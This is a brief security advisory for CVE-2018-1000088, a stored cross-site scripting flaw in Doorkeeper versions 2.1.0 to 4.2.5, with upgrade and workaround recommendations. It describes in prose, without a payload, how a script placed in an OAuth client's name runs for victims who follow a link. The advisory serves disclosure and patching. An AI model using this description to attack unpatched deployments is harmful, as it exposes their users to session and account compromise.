CVE-2018-1000088

Name of the Vulnerable Software and Affected Versions: Doorkeeper versions 2.1.0 through 4.2.5

Description: The issue is related to a Cross Site Scripting (XSS) vulnerability in the web view's OAuth app form and user authorization prompt web view. This can result in Stored XSS on the OAuth Client's name, causing users interacting with it to execute a payload. The attack is exploitable via tricking the victim into clicking an opaque link to the web view that runs the XSS payload, which is virtually indistinguishable from a normal link.

Recommendations: For versions 2.1.0 through 4.2.5, update to version 4.2.6 or 4.3.0 to resolve the issue. As a temporary workaround, consider restricting access to the OAuth app form and user authorization prompt web view until a patch is available.